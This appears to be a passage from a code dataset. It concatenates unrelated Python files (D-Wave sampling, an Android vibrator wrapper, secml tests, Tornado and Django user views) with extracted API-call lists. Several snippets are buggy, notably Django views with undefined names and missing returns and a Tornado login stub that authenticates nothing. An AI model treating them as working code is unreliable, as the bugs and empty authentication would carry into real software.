(2531, 2548), False, 'from flask import Flask, render_template, request\n'), ((3038, 3090), 'flask.render_template', 'render_template', (['"""contacts_ok.html"""'], {'message': 'message'}), "('contacts_ok.html', message=message)\n", (3053, 3090), False, 'from flask import Flask, render_template, request\n'), ((3170, 3195), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (3182, 3195), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1003, 1035), 'api_hh_salary.parsing_av_salary', 'parsing_av_salary', (['city', 'vacancy'], {}), '(city, vacancy)\n', (1020, 1035), False, 'from api_hh_salary import parsing_av_salary\n'), ((1817, 1827), 'db_sqlalchemy_creator.City', 'City', (['city'], {}), '(city)\n', (1821, 1827), False, 'from db_sqlalchemy_creator import Vacancy_info, City, Vacancy, Contacts\n'), ((1947, 1963), 'db_sqlalchemy_creator.Vacancy', 'Vacancy', (['vacancy'], {}), '(vacancy)\n', (1954, 1963), False, 'from db_sqlalchemy_creator import Vacancy_info, City, Vacancy, Contacts\n'), ((2921, 2937), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (2935, 2937), False, 'from datetime import datetime\n')] |
import sys
import dimod
import dwave.inspector
from minorminer import find_embedding
from dwave.cloud import Client
from dwave.embedding import embed_bqm, unembed_sampleset
from dwave.embedding.utils import edgelist_to_adjacency
# define problem
bqm = dimod.BQM.from_ising({}, {'ab': 1, 'bc': 1, 'ca': 1})
# or, load it from file (if provided)
if len(sys.argv) > 1:
path = sys.argv[1]
with open(path) as fp:
bqm = dimod.BinaryQuadraticModel.from_coo(fp).spin
# get solver
print("solver init")
client = Client.from_config()
solver = client.get_solver(qpu=True)
# embed
print("embedding")
source_edgelist = list(bqm.quadratic) + [(v, v) for v in bqm.linear]
target_edgelist = solver.edges
embedding = find_embedding(source_edgelist, target_edgelist)
target_adjacency = edgelist_to_adjacency(target_edgelist)
bqm_embedded = embed_bqm(bqm, embedding, target_adjacency)
# sample
print("sampling")
response = solver.sample_ising(bqm_embedded.linear, bqm_embedded.quadratic,
num_reads=100, label="bqm/response inspector example")
sampleset_embedded = response.sampleset
sampleset = unembed_sampleset(sampleset_embedded, embedding, bqm)
# inspect
print("inspecting")
dwave.inspector.show(bqm, dict(embedding=embedding), response)
| [
"dwave.embedding.unembed_sampleset",
"dwave.embedding.utils.edgelist_to_adjacency",
"dimod.BQM.from_ising",
"dwave.cloud.Client.from_config",
"minorminer.find_embedding",
"dwave.embedding.embed_bqm",
"dimod.BinaryQuadraticModel.from_coo"
] | [((254, 307), 'dimod.BQM.from_ising', 'dimod.BQM.from_ising', (['{}', "{'ab': 1, 'bc': 1, 'ca': 1}"], {}), "({}, {'ab': 1, 'bc': 1, 'ca': 1})\n", (274, 307), False, 'import dimod\n'), ((522, 542), 'dwave.cloud.Client.from_config', 'Client.from_config', ([], {}), '()\n', (540, 542), False, 'from dwave.cloud import Client\n'), ((720, 768), 'minorminer.find_embedding', 'find_embedding', (['source_edgelist', 'target_edgelist'], {}), '(source_edgelist, target_edgelist)\n', (734, 768), False, 'from minorminer import find_embedding\n'), ((788, 826), 'dwave.embedding.utils.edgelist_to_adjacency', 'edgelist_to_adjacency', (['target_edgelist'], {}), '(target_edgelist)\n', (809, 826), False, 'from dwave.embedding.utils import edgelist_to_adjacency\n'), ((842, 885), 'dwave.embedding.embed_bqm', 'embed_bqm', (['bqm', 'embedding', 'target_adjacency'], {}), '(bqm, embedding, target_adjacency)\n', (851, 885), False, 'from dwave.embedding import embed_bqm, unembed_sampleset\n'), ((1128, 1181), 'dwave.embedding.unembed_sampleset', 'unembed_sampleset', (['sampleset_embedded', 'embedding', 'bqm'], {}), '(sampleset_embedded, embedding, bqm)\n', (1145, 1181), False, 'from dwave.embedding import embed_bqm, unembed_sampleset\n'), ((433, 472), 'dimod.BinaryQuadraticModel.from_coo', 'dimod.BinaryQuadraticModel.from_coo', (['fp'], {}), '(fp)\n', (468, 472), False, 'import dimod\n')] |
#!/usr/bin/env python
from __future__ import print_function
import os
import requests
import subprocess
import sys
import re
from cli.appconfig import AppConfig
from cli.settings import Settings
requests.packages.urllib3.disable_warnings()
class ProxyParser:
path_begin_values = {}
backend_services_tcp_ports = {}
def get_proxy_config(self, environment):
proxy_config = ""
settingObj = Settings()
appObj = AppConfig()
config_dir = settingObj.getConfigDir()
roger_env = appObj.getRogerEnv(config_dir)
host = roger_env['environments'][environment]['host']
proxy_config_path = roger_env['environments'][
environment]['proxy_config_path']
url = "{}{}".format(host, proxy_config_path)
proxy_config = requests.get(url).json()
return proxy_config
def parseConfig(self, environment):
path_begin_values = {}
backend_tcp_ports = {}
config = self.get_proxy_config(environment)
for app in config['Apps']:
if 'HTTP_PREFIX' in app['Env']:
path_begin_values[app['Env']['HTTP_PREFIX']] = app['Id']
if app['TcpPorts'] is not None:
for port in app['TcpPorts'].keys():
backend_tcp_ports[port] = app['Id']
self.set_path_begin_values(path_begin_values)
self.set_backend_tcp_ports(backend_tcp_ports)
def set_path_begin_values(self, path_begin_values_aclnames):
self.path_begin_values = path_begin_values_aclnames
def get_path_begin_values(self):
return self.path_begin_values
def set_backend_tcp_ports(self, backend_services_tcp_ports):
self.backend_services_tcp_ports = backend_services_tcp_ports
def get_backend_tcp_ports(self):
return self.backend_services_tcp_ports
| [
"cli.appconfig.AppConfig",
"cli.settings.Settings",
"requests.packages.urllib3.disable_warnings",
"requests.get"
] | [((196, 240), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', ([], {}), '()\n', (238, 240), False, 'import requests\n'), ((419, 429), 'cli.settings.Settings', 'Settings', ([], {}), '()\n', (427, 429), False, 'from cli.settings import Settings\n'), ((447, 458), 'cli.appconfig.AppConfig', 'AppConfig', ([], {}), '()\n', (456, 458), False, 'from cli.appconfig import AppConfig\n'), ((796, 813), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (808, 813), False, 'import requests\n')] |
"""Implementation Vibrator for Android."""
from jnius import autoclass, cast
from plyer.facades import Vibrator
from plyer.platforms.android import activity
from plyer.platforms.android import SDK_INT
Context = autoclass("android.content.Context")
vibrator_service = activity.getSystemService(Context.VIBRATOR_SERVICE)
vibrator = cast("android.os.Vibrator", vibrator_service)
if SDK_INT >= 26:
VibrationEffect = autoclass("android.os.VibrationEffect")
class AndroidVibrator(Vibrator):
"""Android Vibrator class.
Supported features:
* vibrate for some period of time.
* vibrate from given pattern.
* cancel vibration.
* check whether Vibrator exists.
"""
def _vibrate(self, time=None, **kwargs):
if vibrator:
if SDK_INT >= 26:
vibrator.vibrate(
VibrationEffect.createOneShot(
int(1000 * time), VibrationEffect.DEFAULT_AMPLITUDE
)
)
else:
vibrator.vibrate(int(1000 * time))
def _pattern(self, pattern=None, repeat=None, **kwargs):
pattern = [int(1000 * time) for time in pattern]
if vibrator:
if SDK_INT >= 26:
vibrator.vibrate(
VibrationEffect.createWaveform(pattern, repeat)
)
else:
vibrator.vibrate(pattern, repeat)
def _exists(self, **kwargs):
if SDK_INT >= 11:
return vibrator.hasVibrator()
elif vibrator_service is None:
raise NotImplementedError()
return True
def _cancel(self, **kwargs):
vibrator.cancel()
def instance():
"""Returns Vibrator with android features.
:return: instance of class AndroidVibrator
"""
return AndroidVibrator()
| [
"jnius.autoclass",
"plyer.platforms.android.activity.getSystemService",
"jnius.cast"
] | [((213, 249), 'jnius.autoclass', 'autoclass', (['"""android.content.Context"""'], {}), "('android.content.Context')\n", (222, 249), False, 'from jnius import autoclass, cast\n'), ((269, 320), 'plyer.platforms.android.activity.getSystemService', 'activity.getSystemService', (['Context.VIBRATOR_SERVICE'], {}), '(Context.VIBRATOR_SERVICE)\n', (294, 320), False, 'from plyer.platforms.android import activity\n'), ((332, 377), 'jnius.cast', 'cast', (['"""android.os.Vibrator"""', 'vibrator_service'], {}), "('android.os.Vibrator', vibrator_service)\n", (336, 377), False, 'from jnius import autoclass, cast\n'), ((418, 457), 'jnius.autoclass', 'autoclass', (['"""android.os.VibrationEffect"""'], {}), "('android.os.VibrationEffect')\n", (427, 457), False, 'from jnius import autoclass, cast\n')] |
from secml.ml.features.normalization.tests import CNormalizerTestCases
from sklearn.preprocessing import StandardScaler
from secml.ml.features.normalization import CNormalizerMeanStd
class TestCNormalizerMeanStd(CNormalizerTestCases):
"""Unittests for CNormalizerMeanStd."""
def test_transform(self):
"""Test for `.transform()` method."""
for with_std in (True, False):
self.logger.info("Testing using std? {:}".format(with_std))
self._sklearn_comp(self.array_dense,
StandardScaler(with_std=with_std),
CNormalizerMeanStd(with_std=with_std))
self._sklearn_comp(self.array_sparse,
StandardScaler(with_std=with_std),
CNormalizerMeanStd(with_std=with_std))
self._sklearn_comp(self.row_dense.atleast_2d(),
StandardScaler(with_std=with_std),
CNormalizerMeanStd(with_std=with_std))
self._sklearn_comp(self.row_sparse,
StandardScaler(with_std=with_std),
CNormalizerMeanStd(with_std=with_std))
self._sklearn_comp(self.column_dense,
StandardScaler(with_std=with_std),
CNormalizerMeanStd(with_std=with_std))
self._sklearn_comp(self.column_sparse,
StandardScaler(with_std=with_std),
CNormalizerMeanStd(with_std=with_std))
def test_mean_std(self):
"""Test using specific mean/std."""
for (mean, std) in [(1.5, 0.1),
((1.0, 1.1, 1.2, 1.3), (0.0, 0.1, 0.2, 0.3))]:
for array in [self.array_dense, self.array_sparse]:
self.logger.info("Original array is:\n{:}".format(array))
self.logger.info(
"Normalizing using mean: {:} std: {:}".format(mean, std))
n = CNormalizerMeanStd(mean=mean, std=std).fit(array)
out = n.transform(array)
self.logger.info("Result is:\n{:}".format(out))
out_mean = out.mean(axis=0, keepdims=False)
out_std = out.std(axis=0, keepdims=False)
self.logger.info("Result mean is:\n{:}".format(out_mean))
self.logger.info("Result std is:\n{:}".format(out_std))
rev = n.inverse_transform(out)
self.assert_array_almost_equal(array, rev)
def test_chain(self):
"""Test a chain of preprocessors."""
self._test_chain(self.array_dense,
['min-max', 'pca', 'mean-std'],
[{'feature_range': (-5, 5)}, {}, {}])
def test_chain_gradient(self):
"""Check gradient of a chain of preprocessors."""
self._test_chain_gradient(self.array_dense,
['min-max', 'mean-std'],
[{'feature_range': (-5, 5)}, {}])
if __name__ == '__main__':
CNormalizerTestCases.main()
| [
"sklearn.preprocessing.StandardScaler",
"secml.ml.features.normalization.CNormalizerMeanStd",
"secml.ml.features.normalization.tests.CNormalizerTestCases.main"
] | [((3128, 3155), 'secml.ml.features.normalization.tests.CNormalizerTestCases.main', 'CNormalizerTestCases.main', ([], {}), '()\n', (3153, 3155), False, 'from secml.ml.features.normalization.tests import CNormalizerTestCases\n'), ((553, 586), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (567, 586), False, 'from sklearn.preprocessing import StandardScaler\n'), ((619, 656), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (637, 656), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((739, 772), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (753, 772), False, 'from sklearn.preprocessing import StandardScaler\n'), ((805, 842), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (823, 842), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((935, 968), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (949, 968), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1001, 1038), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1019, 1038), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((1119, 1152), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1133, 1152), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1185, 1222), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1203, 1222), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((1305, 1338), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1319, 1338), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1371, 1408), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1389, 1408), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((1492, 1525), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1506, 1525), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1558, 1595), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1576, 1595), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((2057, 2095), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'mean': 'mean', 'std': 'std'}), '(mean=mean, std=std)\n', (2075, 2095), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n')] |
# coding=utf8
from base import ApiBase
from tornado.gen import coroutine, Return
from service.user import ServiceUser
class ApiUserBase(ApiBase):
def __init__(self, *args, **kwargs):
super(ApiUserBase, self).__init__(*args, **kwargs)
self.srv_user = ServiceUser()
class ApiUserLogin(ApiUserBase):
@coroutine
def post(self, *args, **kwargs):
username = self.get_argument('username')
password = self.get_argument('password')
user = self.srv_user.find_one_by_username_password(username, password)
if user:
pass
else:
pass
class ApiUserDetail(ApiUserBase):
@coroutine
def get(self, user_id):
user = yield self.srv_user.find_one_by_id(user_id)
self.json_success(data=user)
class ApiUserRegister(ApiUserBase):
@coroutine
def post(self, *args, **kwargs):
username = self.get_argument('username')
password = self.get_argument('password')
phone = self.get_argument('phone')
sex = self.get_argument('sex')
valid, msg = yield self.srv_user.check_register(username, password, phone, sex)
if not valid:
self.json_error(msg=msg)
else:
user_id = yield self.srv_user.create(username, password, phone, sex)
self.json_success(data=user_id)
| [
"service.user.ServiceUser"
] | [((272, 285), 'service.user.ServiceUser', 'ServiceUser', ([], {}), '()\n', (283, 285), False, 'from service.user import ServiceUser\n')] |
# Copyright 2021 sunehabose
# MIT License
import sys
import unittest
from unittest.mock import patch
sys.path.insert(0, 'code')
import code.user_cli
class TestUserCLI(unittest.TestCase):
@patch('builtins.input', return_value='1')
def test_user_menu_1(self, mock_input) -> None:
code.user_cli.user_menu()
@patch('builtins.input', return_value='2')
def test_user_menu_2(self, mock_input) -> None:
code.user_cli.user_menu()
@patch('builtins.input', return_value='q')
def test_user_menu_q(self, mock_input) -> None:
with self.assertRaises(SystemExit) as cm:
code.user_cli.user_menu()
the_exception = cm.exception
self.assertEqual(the_exception.code, 0)
| [
"sys.path.insert",
"unittest.mock.patch"
] | [((102, 128), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""code"""'], {}), "(0, 'code')\n", (117, 128), False, 'import sys\n'), ((196, 237), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {'return_value': '"""1"""'}), "('builtins.input', return_value='1')\n", (201, 237), False, 'from unittest.mock import patch\n'), ((330, 371), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {'return_value': '"""2"""'}), "('builtins.input', return_value='2')\n", (335, 371), False, 'from unittest.mock import patch\n'), ((464, 505), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {'return_value': '"""q"""'}), "('builtins.input', return_value='q')\n", (469, 505), False, 'from unittest.mock import patch\n')] |
from itertools import combinations
import numpy as np
from PlanningCore.core.constants import State
from PlanningCore.core.physics import (
ball_ball_collision,
ball_cushion_collision,
cue_strike,
evolve_ball_motion,
get_ball_ball_collision_time,
get_ball_cushion_collision_time,
get_roll_time,
get_spin_time,
get_slide_time,
)
from PlanningCore.core.utils import get_rel_velocity
def evolve(pockets, balls, dt):
for ball in balls:
rvw, state = evolve_ball_motion(
pockets=pockets,
state=ball.state,
rvw=ball.rvw,
t=dt,
)
ball.set_rvw(rvw)
ball.set_state(state)
def resolve(collision, table):
if collision['type'] == 'ball_ball':
ball_id1, ball_id2 = collision['agents']
rvw1 = table.balls[ball_id1].rvw
rvw2 = table.balls[ball_id2].rvw
rvw1, rvw2 = ball_ball_collision(rvw1, rvw2)
s1, s2 = State.sliding, State.sliding
table.balls[ball_id1].set_rvw(rvw1)
table.balls[ball_id1].set_state(s1)
table.balls[ball_id2].set_rvw(rvw2)
table.balls[ball_id2].set_state(s2)
elif collision['type'] == 'ball_cushion':
ball_id, cushion_id = collision['agents']
rvw = table.balls[ball_id].rvw
normal = table.cushions[cushion_id]['normal']
rvw = ball_cushion_collision(rvw, normal)
s = State.sliding
table.balls[ball_id].set_rvw(rvw)
table.balls[ball_id].set_state(s)
def detect_collisions(table):
collisions = []
for i, ball1 in enumerate(table.balls):
for j, ball2 in enumerate(table.balls):
if i >= j:
continue
if ball1.state == State.stationary and ball2.state == State.stationary:
continue
if np.linalg.norm(ball1.rvw[0] - ball2.rvw[0]) <= (ball1.radius + ball2.radius):
collisions.append({
'type': 'ball_ball',
'agents': (i, j),
})
for i, ball in enumerate(table.balls):
ball_x, ball_y = ball.pos
if ball_x <= table.left + ball.radius:
collisions.append({
'type': 'ball_cushion',
'agents': (i, 'L'),
})
elif ball_x >= table.right - ball.radius:
collisions.append({
'type': 'ball_cushion',
'agents': (i, 'R'),
})
elif ball_y <= table.bottom + ball.radius:
collisions.append({
'type': 'ball_cushion',
'agents': (i, 'B'),
})
elif ball_y >= table.top - ball.radius:
collisions.append({
'type': 'ball_cushion',
'agents': (i, 'T'),
})
return collisions
def get_min_motion_event_time(balls):
t_min = np.inf
ball_id = None
motion_type = None
for i, ball in enumerate(balls):
if ball.state == State.rolling:
t = get_roll_time(ball.rvw)
tau_spin = get_spin_time(ball.rvw)
event_type = 'rolling_spinning' if tau_spin > t else 'rolling_stationary'
elif ball.state == State.sliding:
t = get_slide_time(ball.rvw)
event_type = 'sliding_rolling'
elif ball.state == State.spinning:
t = get_spin_time(ball.rvw)
event_type = 'spinning_stationary'
else:
continue
if t < t_min:
t_min = t
ball_id = i
motion_type = event_type
return t_min, (ball_id,), motion_type
def get_min_ball_ball_event_time(balls):
t_min = np.inf
ball_ids = (None, None)
for (i, ball1), (j, ball2) in combinations(enumerate(balls), 2):
if ball1.state == State.pocketed or ball2.state == State.pocketed:
continue
if ball1.state == State.stationary and ball2.state == State.stationary:
continue
t = get_ball_ball_collision_time(
rvw1=ball1.rvw,
rvw2=ball2.rvw,
s1=ball1.state,
s2=ball2.state,
)
if t < t_min:
ball_ids = (i, j)
t_min = t
return t_min, ball_ids
def get_min_ball_cushion_event_time(balls, cushions):
"""Returns minimum time until next ball-rail collision"""
t_min = np.inf
agents = (None, None)
for ball_id, ball in enumerate(balls):
if ball.state == State.stationary or ball.state == State.pocketed:
continue
for cushion_id, cushion in cushions.items():
t = get_ball_cushion_collision_time(
rvw=ball.rvw,
s=ball.state,
lx=cushion['lx'],
ly=cushion['ly'],
l0=cushion['l0'],
)
if t < t_min:
agents = (ball_id, cushion_id)
t_min = t
return t_min, agents
def get_next_event(table):
t_min = np.inf
agents = tuple()
event_type = None
t, ids, e = get_min_motion_event_time(table.balls)
if t < t_min:
t_min = t
event_type = e
agents = ids
t, ids = get_min_ball_ball_event_time(table.balls)
if t < t_min:
t_min = t
event_type = 'ball_ball'
agents = ids
t, ids = get_min_ball_cushion_event_time(table.balls, table.cushions)
if t < t_min:
t_min = t
event_type = 'ball_cushion'
agents = ids
return Event(event_type=event_type, event_time=t_min, agents=agents)
def simulate(table, dt=0.033, log=False, no_ball_cushion=False, return_once_pocket=False):
while True:
if return_once_pocket:
for ball in table.balls:
if ball.state == State.pocketed:
return True
if np.all([(ball.state == State.stationary or ball.state == State.pocketed)
for ball in table.balls]):
break
evolve(table.pockets, table.balls, dt)
if log:
table.snapshot(dt)
collisions = detect_collisions(table)
for collision in collisions:
if no_ball_cushion and collision['type'] == 'ball_cushion':
return False
resolve(collision, table)
if log:
table.snapshot(dt)
return True
def simulate_event_based(table, log=False, return_once_pocket=False):
event = Event()
while event.event_time < np.inf:
event = get_next_event(table)
if return_once_pocket:
for ball in table.balls:
if ball.state == State.pocketed:
return True
if np.all([(ball.state == State.stationary or ball.state == State.pocketed)
for ball in table.balls]):
break
evolve(table.pockets, table.balls, dt=event.event_time)
resolve(event.as_dict(), table)
if log:
table.snapshot(event.event_time)
return True
def shot(table, v_cue, phi, ball_index=0, theta=0, a=0, b=0):
v, w = cue_strike(v_cue, phi, theta, a, b)
rvw = table.balls[ball_index].rvw
rvw[1] = v
rvw[2] = w
state = State.rolling if np.abs(np.sum(get_rel_velocity(rvw))) <= 1e-10 else State.sliding
table.balls[ball_index].set_rvw(rvw)
table.balls[ball_index].set_state(state)
class Event(object):
def __init__(self, event_type=None, event_time=0, agents=None):
self.event_type = event_type
self.event_time = event_time
self.agents = agents
def as_dict(self):
return {
'type': self.event_type,
'time': self.event_time,
'agents': self.agents,
} | [
"PlanningCore.core.utils.get_rel_velocity",
"numpy.all",
"PlanningCore.core.physics.get_ball_cushion_collision_time",
"PlanningCore.core.physics.get_ball_ball_collision_time",
"PlanningCore.core.physics.get_roll_time",
"PlanningCore.core.physics.evolve_ball_motion",
"PlanningCore.core.physics.get_slide_... | [((7095, 7130), 'PlanningCore.core.physics.cue_strike', 'cue_strike', (['v_cue', 'phi', 'theta', 'a', 'b'], {}), '(v_cue, phi, theta, a, b)\n', (7105, 7130), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((497, 570), 'PlanningCore.core.physics.evolve_ball_motion', 'evolve_ball_motion', ([], {'pockets': 'pockets', 'state': 'ball.state', 'rvw': 'ball.rvw', 't': 'dt'}), '(pockets=pockets, state=ball.state, rvw=ball.rvw, t=dt)\n', (515, 570), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((914, 945), 'PlanningCore.core.physics.ball_ball_collision', 'ball_ball_collision', (['rvw1', 'rvw2'], {}), '(rvw1, rvw2)\n', (933, 945), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((4003, 4099), 'PlanningCore.core.physics.get_ball_ball_collision_time', 'get_ball_ball_collision_time', ([], {'rvw1': 'ball1.rvw', 'rvw2': 'ball2.rvw', 's1': 'ball1.state', 's2': 'ball2.state'}), '(rvw1=ball1.rvw, rvw2=ball2.rvw, s1=ball1.state,\n s2=ball2.state)\n', (4031, 4099), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((5850, 5952), 'numpy.all', 'np.all', (['[(ball.state == State.stationary or ball.state == State.pocketed) for ball in\n table.balls]'], {}), '([(ball.state == State.stationary or ball.state == State.pocketed) for\n ball in table.balls])\n', (5856, 5952), True, 'import numpy as np\n'), ((6702, 6804), 'numpy.all', 'np.all', (['[(ball.state == State.stationary or ball.state == State.pocketed) for ball in\n table.balls]'], {}), '([(ball.state == State.stationary or ball.state == State.pocketed) for\n ball in table.balls])\n', (6708, 6804), True, 'import numpy as np\n'), ((1375, 1410), 'PlanningCore.core.physics.ball_cushion_collision', 'ball_cushion_collision', (['rvw', 'normal'], {}), '(rvw, normal)\n', (1397, 1410), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((3035, 3058), 'PlanningCore.core.physics.get_roll_time', 'get_roll_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3048, 3058), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((3082, 3105), 'PlanningCore.core.physics.get_spin_time', 'get_spin_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3095, 3105), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((4632, 4750), 'PlanningCore.core.physics.get_ball_cushion_collision_time', 'get_ball_cushion_collision_time', ([], {'rvw': 'ball.rvw', 's': 'ball.state', 'lx': "cushion['lx']", 'ly': "cushion['ly']", 'l0': "cushion['l0']"}), "(rvw=ball.rvw, s=ball.state, lx=cushion['lx'\n ], ly=cushion['ly'], l0=cushion['l0'])\n", (4663, 4750), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((1840, 1883), 'numpy.linalg.norm', 'np.linalg.norm', (['(ball1.rvw[0] - ball2.rvw[0])'], {}), '(ball1.rvw[0] - ball2.rvw[0])\n', (1854, 1883), True, 'import numpy as np\n'), ((3250, 3274), 'PlanningCore.core.physics.get_slide_time', 'get_slide_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3264, 3274), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((3377, 3400), 'PlanningCore.core.physics.get_spin_time', 'get_spin_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3390, 3400), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((7242, 7263), 'PlanningCore.core.utils.get_rel_velocity', 'get_rel_velocity', (['rvw'], {}), '(rvw)\n', (7258, 7263), False, 'from PlanningCore.core.utils import get_rel_velocity\n')] |
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import Context, loader
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.auth import authenticate
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from core.models import Category, Post
from core.forms import CreateAccForm, ForgotPasswordForm, PostForm
@login_required
def index(request):
newpostform = PostForm()
return render(request, 'core/index.html',
{
'categories': get_categories(),
'form': newpostform
})
def login(request):
# request is post, log in
if request.method == 'POST':
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(username=username, password=password)
if user is not None:
login_user(request, user)
return HttpResponseRedirect('/')
else:
return HttpResponse('Error: could not log in')
else:
# request is get, display page
t = loader.get_template('core/login.html')
c = Context()
return HttpResponse(t.render(c))
def logout(request):
logout_user(request)
return redirect('%s?next=%s', (settings.LOGIN_URL, request.path))
# create account view
def createacc(request):
form = CreateAccForm()
if request.method == "POST":
form = CreateAccForm(request.POST)
if form.is_valid():
print("about to create new user")
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
username = form.cleaned_data.get('username')
email = form.cleaned_data.get('email')
password = form.cleaned_data.get('password')
new_user = User.objects.create_user(first_name=first_name, last_name=last_name, username=username, email=email, password=password)
new_user = authenticate(username=username, password=password)
if new_user:
login_user(request, new_user)
print("new user created: " + new_user.get_username() + " " + new_user.get_full_name())
return HttpResponseRedirect('/');
else:
print('failed to authenticate user')
else:
print("invalid form")
return render(request, 'core/createacc.html', {'form': form})
else:
return render(request, 'core/createacc.html', {'form': form})
# forgot password
def forgotpassword(request):
#if request.method == 'POST'
#TODO: forgot password functionality
#else
return render(request, 'core/forgotpassword.html', {'form': form})
def newpost(request):
form = PostForm(request.POST)
if form.is_valid():
cur_user = request.user
title = form.cleaned_data.get('title')
price = form.cleaned_data.get('price')
description = form.cleaned_data.get('description')
poster = cur_user.id
category = form.cleaned_data.get('category')
subcategory = form.cleaned_data.get('subcategory')
Post.objects.create(title=title, price=price, description=description, poster=poster, category=category)
HttpResponseRedirect('/newpostsuccess')
else:
print('form not valid')
HttpResponseRedirect('/')
def newpostsuccess(request):
return render(request, 'core/newpostsuccess.html')
def get_categories():
return Category.objects.all()
| [
"django.shortcuts.render",
"django.contrib.auth.authenticate",
"django.http.HttpResponseRedirect",
"core.models.Category.objects.all",
"core.models.Post.objects.create",
"django.http.HttpResponse",
"django.contrib.auth.login",
"django.contrib.auth.models.User.objects.create_user",
